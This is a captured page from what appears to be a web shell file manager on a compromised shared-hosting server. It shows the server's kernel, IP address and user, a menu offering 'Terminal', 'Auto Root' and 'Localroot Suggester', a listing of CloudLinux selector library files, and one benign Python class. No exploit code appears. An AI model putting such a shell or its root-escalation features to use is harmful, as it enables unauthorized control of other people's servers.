Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
l.v.e-manager /
commons /
lib /
clselect /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
baseclselect
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectnodejs
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectnodejsuser
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectphp
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectphpuser
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectpython
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectpythonuser
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
clselectruby
[ DIR ]
drwxr-xr-x
2026-09-04 11:42
__init__.py
536
B
-rw-r--r--
2026-08-11 11:38
clextselect.py
20.27
KB
-rw-r--r--
2026-08-11 11:38
clpassenger.py
30.2
KB
-rw-r--r--
2026-08-11 11:38
clselect.py
21.96
KB
-rw-r--r--
2026-08-11 11:38
clselectctl.py
10.04
KB
-rw-r--r--
2026-08-11 11:38
clselectctlnodejsuser.py
23.6
KB
-rw-r--r--
2026-08-11 11:38
clselectctlphp.py
48.26
KB
-rw-r--r--
2026-08-11 11:38
clselectctlpython.py
50.79
KB
-rw-r--r--
2026-08-11 11:38
clselectctlruby.py
19.22
KB
-rw-r--r--
2026-08-11 11:38
clselectdomains.py
4.6
KB
-rw-r--r--
2026-08-11 11:38
clselectexcept.py
10.22
KB
-rw-r--r--
2026-08-11 11:38
clselectprint.py
6.31
KB
-rw-r--r--
2026-08-11 11:38
clselectstatistics.py
3.81
KB
-rw-r--r--
2026-08-11 11:38
cluserextselect.py
16.96
KB
-rw-r--r--
2026-08-11 11:38
cluseroptselect.py
28.27
KB
-rw-r--r--
2026-08-11 11:38
cluserselect.py
35.04
KB
-rw-r--r--
2026-08-11 11:38
locked_extensions.ini
1.2
KB
-rw-r--r--
2026-08-11 11:38
models.py
815
B
-rw-r--r--
2026-08-11 11:38
utils.py
17.97
KB
-rw-r--r--
2026-08-11 11:38
Save
Rename
# -*- coding: utf-8 -*- # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT class Website(object): """ Represents a website with its domain and document root. Used for per-domain configuration in PHP Selector. """ def __init__(self, domain: str, docroot: str): """ Initialize Website instance """ self.domain = domain self.docroot = docroot def __repr__(self): return "Website(domain='%s', docroot='%s')" % (self.domain, self.docroot) def __eq__(self, other): if not isinstance(other, Website): return False return self.domain == other.domain and self.docroot == other.docroot